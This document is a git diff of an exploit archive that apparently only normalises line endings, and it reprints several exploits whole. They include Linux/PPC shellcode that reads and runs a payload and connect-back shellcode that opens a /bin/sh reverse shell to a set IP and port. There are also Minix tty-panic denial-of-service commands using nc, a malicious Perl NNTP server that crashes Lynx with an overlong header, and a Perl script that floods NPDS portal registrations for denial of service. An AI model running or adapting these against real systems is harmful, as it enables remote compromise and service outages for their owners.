/* mtctr r1 */ -"\x4e\x80\x04\x21"; /* bctrl */ - -int main(void) -{ - void (*shell)() = (void *)&hellcode; - printf("%d byte read & exec shellcode for linux/ppc by core\n", - strlen(hellcode)); - shell(); - return 0; -} - +/* readnexecppc-core.c by Charles Stevenson */ +char hellcode[] = /* read(0,stack,1028); stack(); linux/ppc by core */ +"\x7c\x63\x1a\x79" /* xor. r3,r3,r3 */ +"\x38\xa0\x04\x04" /* li r5,1028 */ +"\x30\x05\xfb\xff" /* addic r0,r5,-1025 */ +"\x7c\x24\x0b\x78" /* mr r4,r1 */ +"\x44\xde\xad\xf2" /* sc */ +"\x69\x69\x69\x69" /* nop */ +"\x7c\x29\x03\xa6" /* mtctr r1 */ +"\x4e\x80\x04\x21"; /* bctrl */ + +int main(void) +{ + void (*shell)() = (void *)&hellcode; + printf("%d byte read & exec shellcode for linux/ppc by core\n", + strlen(hellcode)); + shell(); + return 0; +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/linux_ppc/shellcode/13303.c b/platforms/linux_ppc/shellcode/13303.c index b8f204cc6..9283a6a86 100755 --- a/platforms/linux_ppc/shellcode/13303.c +++ b/platforms/linux_ppc/shellcode/13303.c @@ -1,82 +1,82 @@ -/* connect-core5.c by Charles Stevenson */ -char hellcode[] = /* connect back & execve /bin/sh linux/ppc by core */ -"\x7c\x3f\x0b\x78" /*mr r31,r1*/ -"\x3b\x40\x01\x0e" /*li r26,270*/ -"\x3b\x5a\xfe\xf4" /*addi r26,r26,-268*/ -"\x7f\x43\xd3\x78" /*mr r3,r26*/ -"\x3b\x60\x01\x0d" /*li r27,269*/ -"\x3b\x7b\xfe\xf4" /*addi r27,r27,-268*/ -"\x7f\x64\xdb\x78" /*mr r4,r27*/ -"\x7c\xa5\x2a\x78" /*xor r5,r5,r5*/ -"\x7c\x3c\x0b\x78" /*mr r28,r1*/ -"\x3b\x9c\x01\x0c" /*addi r28,r28,268*/ -"\x90\x7c\xff\x08" /*stw r3,-248(r28)*/ -"\x90\x9c\xff\x0c" /*stw r4,-244(r28)*/ -"\x90\xbc\xff\x10" /*stw r5,-240(r28)*/ -"\x7f\x63\xdb\x78" /*mr r3,r27*/ -"\x3b\xdf\x01\x0c" /*addi r30,r31,268*/ -"\x38\x9e\xff\x08" /*addi r4,r30,-248*/ -"\x3b\x20\x01\x98" /*li r25,408*/ -"\x7f\x20\x16\x70" /*srawi r0,r25,2*/ -"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ -"\x7c\x78\x1b\x78" /*mr r24,r3*/ -"\xb3\x5e\xff\x16" /*sth r26,-234(r30)*/ -"\x7f\xbd\xea\x78" /*xor r29,r29,r29*/ -// Craft your exploit to poke these value in. Right now it's set -// for port 31337 and ip 192.168.1.1. Here's an example -// core@morpheus:~$ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 1 1 -// 0xc0a8 -// 0x0101 -"\x63\xbd" /* PORT # */ "\x7a\x69" /*ori r29,r29,31337*/ -"\xb3\xbe\xff\x18" /*sth r29,-232(r30)*/ -"\x3f\xa0" /*IP(A.B) */ "\xc0\xa8" /*lis r29,-16216*/ -"\x63\xbd" /*IP(C.D) */ "\x01\x01" /*ori r29,r29,257*/ -"\x93\xbe\xff\x1a" /*stw r29,-230(r30)*/ -"\x93\x1c\xff\x08" /*stw r24,-248(r28)*/ -"\x3a\xde\xff\x16" /*addi r22,r30,-234*/ -"\x92\xdc\xff\x0c" /*stw r22,-244(r28)*/ -"\x3b\xa0\x01\x1c" /*li r29,284*/ -"\x38\xbd\xfe\xf4" /*addi r5,r29,-268*/ -"\x90\xbc\xff\x10" /*stw r5,-240(r28)*/ -"\x7f\x20\x16\x70" /*srawi r0,r25,2*/ -"\x7c\x7a\xda\x14" /*add r3,r26,r27*/ -"\x38\x9c\xff\x08" /*addi r4,r28,-248*/ -"\x44\xde\xad\xf2" /*.long0x44deadf2*/ -"\x7f\x03\xc3\x78" /*mr r3,r24*/ -"\x7c\x84\x22\x78" /*xor r4,r4,r4*/ -"\x3a\xe0\x01\xf8" /*li r23,504*/ -"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ -"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ -"\x7f\x03\xc3\x78" /*mr r3,r24*/ -"\x7f\x64\xdb\x78" /*mr r4,r27*/ -"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ -"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ -// comment out the next 4 lines to save 16 bytes and lose stderr -//"\x7f\x03\xc3\x78" /*mr r3,r24*/ -//"\x7f\x44\xd3\x78" /*mr r4,r26*/ -//"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ -//"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ -"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/ -"\x42\x40\xff\x35" /*bdzl+ 10000454
*/ -"\x7f\x08\x02\xa6" /*mflr r24*/ -"\x3b\x18\x01\x34" /*addi r24,r24,308*/ -"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/ -"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/ -"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/ -"\x38\x81\xff\xf8" /*addi r4,r1,-8*/ -"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/ -"\x3b\xc0\x01\x60" /*li r30,352*/ -"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/ -"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ -"/bin/shZ"; /* Z will become NULL */ - -int main(void) -{ - void (*shell)() = (void *)&hellcode; - printf("%d byte connect back execve /bin/sh for linux/ppc by core\n", - strlen(hellcode)); - shell(); - return 0; -} - +/* connect-core5.c by Charles Stevenson */ +char hellcode[] = /* connect back & execve /bin/sh linux/ppc by core */ +"\x7c\x3f\x0b\x78" /*mr r31,r1*/ +"\x3b\x40\x01\x0e" /*li r26,270*/ +"\x3b\x5a\xfe\xf4" /*addi r26,r26,-268*/ +"\x7f\x43\xd3\x78" /*mr r3,r26*/ +"\x3b\x60\x01\x0d" /*li r27,269*/ +"\x3b\x7b\xfe\xf4" /*addi r27,r27,-268*/ +"\x7f\x64\xdb\x78" /*mr r4,r27*/ +"\x7c\xa5\x2a\x78" /*xor r5,r5,r5*/ +"\x7c\x3c\x0b\x78" /*mr r28,r1*/ +"\x3b\x9c\x01\x0c" /*addi r28,r28,268*/ +"\x90\x7c\xff\x08" /*stw r3,-248(r28)*/ +"\x90\x9c\xff\x0c" /*stw r4,-244(r28)*/ +"\x90\xbc\xff\x10" /*stw r5,-240(r28)*/ +"\x7f\x63\xdb\x78" /*mr r3,r27*/ +"\x3b\xdf\x01\x0c" /*addi r30,r31,268*/ +"\x38\x9e\xff\x08" /*addi r4,r30,-248*/ +"\x3b\x20\x01\x98" /*li r25,408*/ +"\x7f\x20\x16\x70" /*srawi r0,r25,2*/ +"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ +"\x7c\x78\x1b\x78" /*mr r24,r3*/ +"\xb3\x5e\xff\x16" /*sth r26,-234(r30)*/ +"\x7f\xbd\xea\x78" /*xor r29,r29,r29*/ +// Craft your exploit to poke these value in. Right now it's set +// for port 31337 and ip 192.168.1.1. Here's an example +// core@morpheus:~$ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 1 1 +// 0xc0a8 +// 0x0101 +"\x63\xbd" /* PORT # */ "\x7a\x69" /*ori r29,r29,31337*/ +"\xb3\xbe\xff\x18" /*sth r29,-232(r30)*/ +"\x3f\xa0" /*IP(A.B) */ "\xc0\xa8" /*lis r29,-16216*/ +"\x63\xbd" /*IP(C.D) */ "\x01\x01" /*ori r29,r29,257*/ +"\x93\xbe\xff\x1a" /*stw r29,-230(r30)*/ +"\x93\x1c\xff\x08" /*stw r24,-248(r28)*/ +"\x3a\xde\xff\x16" /*addi r22,r30,-234*/ +"\x92\xdc\xff\x0c" /*stw r22,-244(r28)*/ +"\x3b\xa0\x01\x1c" /*li r29,284*/ +"\x38\xbd\xfe\xf4" /*addi r5,r29,-268*/ +"\x90\xbc\xff\x10" /*stw r5,-240(r28)*/ +"\x7f\x20\x16\x70" /*srawi r0,r25,2*/ +"\x7c\x7a\xda\x14" /*add r3,r26,r27*/ +"\x38\x9c\xff\x08" /*addi r4,r28,-248*/ +"\x44\xde\xad\xf2" /*.long0x44deadf2*/ +"\x7f\x03\xc3\x78" /*mr r3,r24*/ +"\x7c\x84\x22\x78" /*xor r4,r4,r4*/ +"\x3a\xe0\x01\xf8" /*li r23,504*/ +"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ +"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ +"\x7f\x03\xc3\x78" /*mr r3,r24*/ +"\x7f\x64\xdb\x78" /*mr r4,r27*/ +"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ +"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ +// comment out the next 4 lines to save 16 bytes and lose stderr +//"\x7f\x03\xc3\x78" /*mr r3,r24*/ +//"\x7f\x44\xd3\x78" /*mr r4,r26*/ +//"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ +//"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ +"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/ +"\x42\x40\xff\x35" /*bdzl+ 10000454
*/ +"\x7f\x08\x02\xa6" /*mflr r24*/ +"\x3b\x18\x01\x34" /*addi r24,r24,308*/ +"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/ +"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/ +"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/ +"\x38\x81\xff\xf8" /*addi r4,r1,-8*/ +"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/ +"\x3b\xc0\x01\x60" /*li r30,352*/ +"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/ +"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ +"/bin/shZ"; /* Z will become NULL */ + +int main(void) +{ + void (*shell)() = (void *)&hellcode; + printf("%d byte connect back execve /bin/sh for linux/ppc by core\n", + strlen(hellcode)); + shell(); + return 0; +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/linux_ppc/shellcode/13304.c b/platforms/linux_ppc/shellcode/13304.c index 863ce2bf5..5d84ff535 100755 --- a/platforms/linux_ppc/shellcode/13304.c +++ b/platforms/linux_ppc/shellcode/13304.c @@ -65,6 +65,6 @@ void main() .Lfe1: .size m,.Lfe1-m -*/ - +*/ + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/linux_sparc/shellcode/13305.c b/platforms/linux_sparc/shellcode/13305.c index 9e195ee8f..625dd3b5d 100755 --- a/platforms/linux_sparc/shellcode/13305.c +++ b/platforms/linux_sparc/shellcode/13305.c @@ -99,6 +99,6 @@ main() ********************************************************************************/ -//EOF - +//EOF + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/linux_sparc/shellcode/13306.c b/platforms/linux_sparc/shellcode/13306.c index 0e8770666..7ad5131e2 100755 --- a/platforms/linux_sparc/shellcode/13306.c +++ b/platforms/linux_sparc/shellcode/13306.c @@ -101,6 +101,6 @@ main() // test that techno-devil! } -/* EOF */ - +/* EOF */ + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/minix/dos/6120.txt b/platforms/minix/dos/6120.txt index 818f359a2..3ba39fb26 100755 --- a/platforms/minix/dos/6120.txt +++ b/platforms/minix/dos/6120.txt @@ -1,28 +1,28 @@ -# kokanin@gmail 20080723 -# minix 3.1.2a tty panic - -trunk/src/drivers/tty/tty.c - - 14965 if ((status = send(replyee, &tty_mess)) != OK) { - 14966 panic("TTY","tty_reply failed, status\n", status); - -$ uname -a -Minix 192.168.1.2 3 1.2a i686 -$ while true ; do (yes "yes yes minix uh ah"&) ; done -[snip snip] -$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C - -...disconnected - -telnet 192.168.1.2 -Trying 192.168.1.2... -Connected to 192.168.1.2. -Escape character is '^]'. -I am sorry, but there is no free PTY left! -Connection closed by foreign host. - -hai, no moar pty, kthxbye --- -kokanin - -# milw0rm.com [2008-07-23] +# kokanin@gmail 20080723 +# minix 3.1.2a tty panic + +trunk/src/drivers/tty/tty.c + + 14965 if ((status = send(replyee, &tty_mess)) != OK) { + 14966 panic("TTY","tty_reply failed, status\n", status); + +$ uname -a +Minix 192.168.1.2 3 1.2a i686 +$ while true ; do (yes "yes yes minix uh ah"&) ; done +[snip snip] +$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C + +...disconnected + +telnet 192.168.1.2 +Trying 192.168.1.2... +Connected to 192.168.1.2. +Escape character is '^]'. +I am sorry, but there is no free PTY left! +Connection closed by foreign host. + +hai, no moar pty, kthxbye +-- +kokanin + +# milw0rm.com [2008-07-23] diff --git a/platforms/minix/dos/6129.txt b/platforms/minix/dos/6129.txt index 5eb8e8863..73d5bafa1 100755 --- a/platforms/minix/dos/6129.txt +++ b/platforms/minix/dos/6129.txt @@ -1,21 +1,21 @@ -# kokanin@gmail 20080724 -# minix 3.1.2a remote tty panic - -trunk/src/drivers/tty/tty.c - - 14965 if ((status = send(replyee, &tty_mess)) != OK) { - 14966 panic("TTY","tty_reply failed, status\n", status); - - -$ (while true ; do sleep 1 && killall nc 2>/dev/null; done) & -$ while true ; do cat /dev/urandom | nc 192.168.1.42 23 ; done -[snip garbage] -I am sorry, but there is no free PTY left! -$ fg -$ ^C - -hai, no moar pty, remotely, kthxbye --- -kokanin - -# milw0rm.com [2008-07-25] +# kokanin@gmail 20080724 +# minix 3.1.2a remote tty panic + +trunk/src/drivers/tty/tty.c + + 14965 if ((status = send(replyee, &tty_mess)) != OK) { + 14966 panic("TTY","tty_reply failed, status\n", status); + + +$ (while true ; do sleep 1 && killall nc 2>/dev/null; done) & +$ while true ; do cat /dev/urandom | nc 192.168.1.42 23 ; done +[snip garbage] +I am sorry, but there is no free PTY left! +$ fg +$ ^C + +hai, no moar pty, remotely, kthxbye +-- +kokanin + +# milw0rm.com [2008-07-25] diff --git a/platforms/multiple/dos/1008.c b/platforms/multiple/dos/1008.c index 4b273d2d1..ee036af8c 100755 --- a/platforms/multiple/dos/1008.c +++ b/platforms/multiple/dos/1008.c @@ -250,6 +250,6 @@ return (1); close(sock); printf("done\n"); return (0); -} - -// milw0rm.com [2005-05-21] +} + +// milw0rm.com [2005-05-21] diff --git a/platforms/multiple/dos/1037.c b/platforms/multiple/dos/1037.c index 27bcdf5c2..6353f3bf8 100755 --- a/platforms/multiple/dos/1037.c +++ b/platforms/multiple/dos/1037.c @@ -355,6 +355,6 @@ fprintf(stderr, " [-a Path Attributes] [-A Attribute Length]\n" " [-i Reachability Information] [-I Reachability Information length]\n", name); -} - -// milw0rm.com [2005-06-09] +} + +// milw0rm.com [2005-06-09] diff --git a/platforms/multiple/dos/1056.pl b/platforms/multiple/dos/1056.pl index cc87029fb..5cc2b9191 100755 --- a/platforms/multiple/dos/1056.pl +++ b/platforms/multiple/dos/1056.pl @@ -49,6 +49,6 @@ $buf.=$buf2."\r\n\r\n"; send($sock,$buf,0) || die "send error:$@\n"; print "Ok, the buffer sent to the target \n"; -close($sock); - -# milw0rm.com [2005-06-20] +close($sock); + +# milw0rm.com [2005-06-20] diff --git a/platforms/multiple/dos/1176.c b/platforms/multiple/dos/1176.c index 7fa8a4fc6..28f377d92 100755 --- a/platforms/multiple/dos/1176.c +++ b/platforms/multiple/dos/1176.c @@ -565,6 +565,6 @@ u_int resolv(char *host) { perror("\nError"); exit(1); } -#endif - -// milw0rm.com [2005-08-23] +#endif + +// milw0rm.com [2005-08-23] diff --git a/platforms/multiple/dos/1204.html b/platforms/multiple/dos/1204.html index fc6d3847a..285c65da4 100755 --- a/platforms/multiple/dos/1204.html +++ b/platforms/multiple/dos/1204.html @@ -1,4 +1,3 @@ - - -# milw0rm.com [2005-09-09] + +# milw0rm.com [2005-09-09] diff --git a/platforms/multiple/dos/1213.c b/platforms/multiple/dos/1213.c index a05a4555c..878214b47 100755 --- a/platforms/multiple/dos/1213.c +++ b/platforms/multiple/dos/1213.c @@ -1,4 +1,3 @@ - /*_------------------------------------------_ ||------+ Snort <= 2.4.0 Trigger p0c +------|| ||__________________________________________|| @@ -165,6 +164,6 @@ int main(int argc, char **argv) close(sockfd); return 0; -} - -// milw0rm.com [2005-09-12] +} + +// milw0rm.com [2005-09-12] diff --git a/platforms/multiple/dos/1254.html b/platforms/multiple/dos/1254.html index 51e10cf33..27bbbe01a 100755 --- a/platforms/multiple/dos/1254.html +++ b/platforms/multiple/dos/1254.html @@ -1,11 +1,11 @@ - - -AA
A
- -# milw0rm.com [2005-10-16] + + +AA
A
+ +# milw0rm.com [2005-10-16] diff --git a/platforms/multiple/dos/1256.pl b/platforms/multiple/dos/1256.pl index c71b670e8..0622e2f9b 100755 --- a/platforms/multiple/dos/1256.pl +++ b/platforms/multiple/dos/1256.pl @@ -1,111 +1,111 @@ -#!/usr/bin/perl -- - -# lynx-nntp-server -# by Ulf Harnhammar in 2005 -# I hereby place this program in the public domain. - -use strict; -use IO::Socket; - -$main::port = 119; -$main::timeout = 5; - -# *** SUBROUTINES *** - -sub mysend($$) -{ -my $file = shift; -my $str = shift; - -print $file "$str\n"; -print "SENT: $str\n"; -} # sub mysend - -sub myreceive($) -{ -my $file = shift; -my $inp; - -eval -{ -local $SIG{ALRM} = sub { die "alarm\n" }; -alarm $main::timeout; -$inp = <$file>; -alarm 0; -}; - -if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; } -$inp =~ tr/\015\012\000//d; -print "RECEIVED: $inp\n"; -$inp; -} # sub myreceive - -# *** MAIN PROGRAM *** - -{ -my $server = IO::Socket::INET->new( Proto => 'tcp', -LocalPort => $main::port, -Listen => SOMAXCONN, -Reuse => 1); -die "can't set up server!\n" unless $server; - - -while (my $client = $server->accept()) -{ -$client->autoflush(1); -print 'connection from '.$client->peerhost."\n"; - - -mysend($client, '200 Internet News'); -my $group = 'alt.angst'; - -while (my $str = myreceive($client)) -{ -if ($str =~ m/^mode reader$/i) -{ -mysend($client, '200 Internet News'); -next; -} - -if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i) -{ -$group = $1; -mysend($client, "211 1 1 1 $group"); -next; -} - -if ($str =~ m/^quit$/i) -{ -mysend($client, '205 Goodbye'); -last; -} - -if ($str =~ m/^head ([0-9]+)$/i) -{ -my $evil = '$@UU(JUU' x 21; # Edit the number! -$evil .= 'U' x (504 - length $evil); - -my $head = < -Path: host!someotherhost!onemorehost -From: -Subject: $evil -Newsgroup: $group -Message-ID: -. -HERE - -$head =~ s|\s+$||s; -mysend($client, $head); -next; -} - -mysend($client, '500 Syntax Error'); -} # while str=myreceive(client) - -close $client; -print "closed\n\n\n"; -} # while client=server->accept() -} - -# milw0rm.com [2005-10-17] +#!/usr/bin/perl -- + +# lynx-nntp-server +# by Ulf Harnhammar in 2005 +# I hereby place this program in the public domain. + +use strict; +use IO::Socket; + +$main::port = 119; +$main::timeout = 5; + +# *** SUBROUTINES *** + +sub mysend($$) +{ +my $file = shift; +my $str = shift; + +print $file "$str\n"; +print "SENT: $str\n"; +} # sub mysend + +sub myreceive($) +{ +my $file = shift; +my $inp; + +eval +{ +local $SIG{ALRM} = sub { die "alarm\n" }; +alarm $main::timeout; +$inp = <$file>; +alarm 0; +}; + +if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; } +$inp =~ tr/\015\012\000//d; +print "RECEIVED: $inp\n"; +$inp; +} # sub myreceive + +# *** MAIN PROGRAM *** + +{ +my $server = IO::Socket::INET->new( Proto => 'tcp', +LocalPort => $main::port, +Listen => SOMAXCONN, +Reuse => 1); +die "can't set up server!\n" unless $server; + + +while (my $client = $server->accept()) +{ +$client->autoflush(1); +print 'connection from '.$client->peerhost."\n"; + + +mysend($client, '200 Internet News'); +my $group = 'alt.angst'; + +while (my $str = myreceive($client)) +{ +if ($str =~ m/^mode reader$/i) +{ +mysend($client, '200 Internet News'); +next; +} + +if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i) +{ +$group = $1; +mysend($client, "211 1 1 1 $group"); +next; +} + +if ($str =~ m/^quit$/i) +{ +mysend($client, '205 Goodbye'); +last; +} + +if ($str =~ m/^head ([0-9]+)$/i) +{ +my $evil = '$@UU(JUU' x 21; # Edit the number! +$evil .= 'U' x (504 - length $evil); + +my $head = < +Path: host!someotherhost!onemorehost +From: +Subject: $evil +Newsgroup: $group +Message-ID: +. +HERE + +$head =~ s|\s+$||s; +mysend($client, $head); +next; +} + +mysend($client, '500 Syntax Error'); +} # while str=myreceive(client) + +close $client; +print "closed\n\n\n"; +} # while client=server->accept() +} + +# milw0rm.com [2005-10-17] diff --git a/platforms/multiple/dos/1268.pl b/platforms/multiple/dos/1268.pl index 5c415887e..d69ec868c 100755 --- a/platforms/multiple/dos/1268.pl +++ b/platforms/multiple/dos/1268.pl @@ -1,141 +1,141 @@ -#!/usr/bin/perl -################################################################ -#Type|+ Register multiple users for Denial of Service -#Vendor url|+ www.npds.org -#Little description|+ NPDS (Net Portal Dynamic System) is a French(and now English !) GNU dynamic portal -#Solution|+ None official but you can add a visual confirmation if you like php ;) -#Worked on|+ Last version(5.0, tested), probably prior -#Files|+ Exploit=npds50.pl Bind=malicious_npds.pl Log=log_npds_dos.txt -#Credits|+ Vulnerability find and coded by DarkFig -#Greetz|+ Acid root, [*BoD*] , Milw0rm.com (best website in the world !!) and all people who know me ;) -#Note|+ Bind option if for DDoS attack | If the website send password to the email no registration but it add an email in the database (can make Dos !) ;) | Sorry for my bad english ^^ -################################################################ -use IO::Socket; -if (@ARGV < 7) { -print q( -+------------------------------------------------------------------------+ -+ Net Portal Dynamic System <5.0 + -+ Register multiple users Denial of Service + -+------------------------------------------------------------------------+ -+ Usage|npds50.pl + -+------------------------------------------------------------------------+ -+ => Website send password to the email ? [Yes=1] [No=0] + -+ => The port of the website (default is 80) + -+ => Number of registration [Infinite=loop] + -+ => Log activity in a file [Yes=1] [No=0] + -+ => Generate a malicious file for DDOS [Yes=1] [No=0] + -+------------------------------------------------------------------------+ -+ Found and coded by DarkFig + -+------------------------------------------------------------------------+ -); exit();} - -#Initializing data -$host = $ARGV[0]; -$path = $ARGV[1]; -$port = $ARGV[2]; -$sendpwd = $ARGV[3]; -$nb_reg = $ARGV[4]; -$log = $ARGV[5]; -$bind = $ARGV[6]; -$x = 0; -if($nb_reg eq "loop") {$nb_reg = "-5";} - -#If bind=yes -if($bind eq "1") { -print q( -+-----------------------------------+ -+ Net Portal Dynamic System <5.0 + -+ Register multiple users for DoS + -+ Found and coded by DarkFig + -+-----------------------------------+); -print "\n [+] Generate a malicious file..."; -open FILE, ">malicious_npds.pl"; -print FILE "use IO::Socket;"; -print FILE "\n"; print FILE q($log = "); print FILE "$log"; print FILE q(";); -print FILE "\n"; print FILE q($host = "); print FILE "$host"; print FILE q(";); -print FILE "\n"; print FILE q($port = ); print FILE "$port;"; -print FILE "\n"; print FILE q($nb_reg = ); print FILE "$nb_reg;"; -print FILE "\n"; print FILE q($path = "); print FILE "$path"; print FILE q(";); -print FILE "\n"; print FILE q($x = 0;); -print FILE "\n"; print FILE q(if($nb_reg eq "loop"){$nb_reg = "-5";}); -print FILE "\n"; -print FILE q(while($x != $nb_reg) { -$email = "godman"."$x"."%40hotmail.com"; -$pseudo = "0rrn"."$x"."&"; -$password = "g0_odp4sswd"; -); -if($sendpwd eq "0"){print FILE q($full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&pass="."$password"."&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";);} -if($sendpwd eq "1"){print FILE q($full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";);} -print FILE q( -my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "$port",Proto => "tcp",); -die "\n[-] Can't connect to the host, maybe Dosed !\n" unless $sock; -print $sock "GET $full_url HTTP/1.1\n"; -print $sock "Host: $host\n"; -close($sock); -if($log eq "1") { -open FILE, ">log_npds_dos.txt"; -print FILE q( -+-----------------------------------+ -+ Net Portal Dynamic System <5.0 + -+ Register multiple users for DoS + -+ ~~Activity logged~~ + -+-----------------------------------+); -print FILE "\n Host| $host"; -print FILE "\n Path| $path"; -print FILE "\n Port| $port"; -print FILE "\n Registration| $x"; -print FILE "\n+-----------------------------------+"; -print FILE "\n+ Logged by DarkFig +"; -print FILE "\n+-----------------------------------+"; -close FILE;} -$x++; -syswrite STDOUT, "-$x";}); close FILE; -print "\n [+] Malicious file generate !"; -print "\n+-----------------------------------+\n"; -exit();} - -#If bind=no -if($bind eq "0") { -print q( -+-----------------------------------+ -+ Net Portal Dynamic System <5.0 + -+ Register multiple users for DoS + -+ Found and coded by DarkFig + -+-----------------------------------+); -print "\n[~] Connecting to the host.."; -my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "$port",Proto => "tcp",); -die "\n[-] Can't connect to the host: $!\n" unless $sock; close($sock); -print "\n[+] Connected !"; -print "\n[~] Sending data..."; -print "\n[+] Number of registration\n"; -while($x != $nb_reg) { -$email = "ownv"."$x"."%40hotmail.com"; -$pseudo = "0orn"."$x"."&"; -$password = "g0_odp4sswd"; -if($sendpwd eq "0"){$full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&pass="."$password"."&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";} -if($sendpwd eq "1"){$full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";} -my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "$port",Proto => "tcp",); -die "\n[-] Can't connect to the host, maybe Dosed !\n" unless $sock; -print $sock "GET $full_url HTTP/1.1\n"; -print $sock "Host: $host\n"; -close($sock); -if($log eq "1") { -open FILE, ">log_npds_dos.txt"; -print FILE q( -+-----------------------------------+ -+ Net Portal Dynamic System <5.0 + -+ Register multiple users for DoS + -+ ~~Activity logged~~ + -+-----------------------------------+); -print FILE "\n Host| $host"; -print FILE "\n Path| $path"; -print FILE "\n Port| $port"; -print FILE "\n Registration| $x"; -print FILE "\n+-----------------------------------+"; -print FILE "\n+ Logged by DarkFig +"; -print FILE "\n+-----------------------------------+"; -close FILE;} -$x++; -syswrite STDOUT, "-$x";}} - -# milw0rm.com [2005-10-21] +#!/usr/bin/perl +################################################################ +#Type|+ Register multiple users for Denial of Service +#Vendor url|+ www.npds.org +#Little description|+ NPDS (Net Portal Dynamic System) is a French(and now English !) GNU dynamic portal +#Solution|+ None official but you can add a visual confirmation if you like php ;) +#Worked on|+ Last version(5.0, tested), probably prior +#Files|+ Exploit=npds50.pl Bind=malicious_npds.pl Log=log_npds_dos.txt +#Credits|+ Vulnerability find and coded by DarkFig +#Greetz|+ Acid root, [*BoD*] , Milw0rm.com (best website in the world !!) and all people who know me ;) +#Note|+ Bind option if for DDoS attack | If the website send password to the email no registration but it add an email in the database (can make Dos !) ;) | Sorry for my bad english ^^ +################################################################ +use IO::Socket; +if (@ARGV < 7) { +print q( ++------------------------------------------------------------------------+ ++ Net Portal Dynamic System <5.0 + ++ Register multiple users Denial of Service + ++------------------------------------------------------------------------+ ++ Usage|npds50.pl + ++------------------------------------------------------------------------+ ++ => Website send password to the email ? [Yes=1] [No=0] + ++ => The port of the website (default is 80) + ++ => Number of registration [Infinite=loop] + ++ => Log activity in a file [Yes=1] [No=0] + ++ => Generate a malicious file for DDOS [Yes=1] [No=0] + ++------------------------------------------------------------------------+ ++ Found and coded by DarkFig + ++------------------------------------------------------------------------+ +); exit();} + +#Initializing data +$host = $ARGV[0]; +$path = $ARGV[1]; +$port = $ARGV[2]; +$sendpwd = $ARGV[3]; +$nb_reg = $ARGV[4]; +$log = $ARGV[5]; +$bind = $ARGV[6]; +$x = 0; +if($nb_reg eq "loop") {$nb_reg = "-5";} + +#If bind=yes +if($bind eq "1") { +print q( ++-----------------------------------+ ++ Net Portal Dynamic System <5.0 + ++ Register multiple users for DoS + ++ Found and coded by DarkFig + ++-----------------------------------+); +print "\n [+] Generate a malicious file..."; +open FILE, ">malicious_npds.pl"; +print FILE "use IO::Socket;"; +print FILE "\n"; print FILE q($log = "); print FILE "$log"; print FILE q(";); +print FILE "\n"; print FILE q($host = "); print FILE "$host"; print FILE q(";); +print FILE "\n"; print FILE q($port = ); print FILE "$port;"; +print FILE "\n"; print FILE q($nb_reg = ); print FILE "$nb_reg;"; +print FILE "\n"; print FILE q($path = "); print FILE "$path"; print FILE 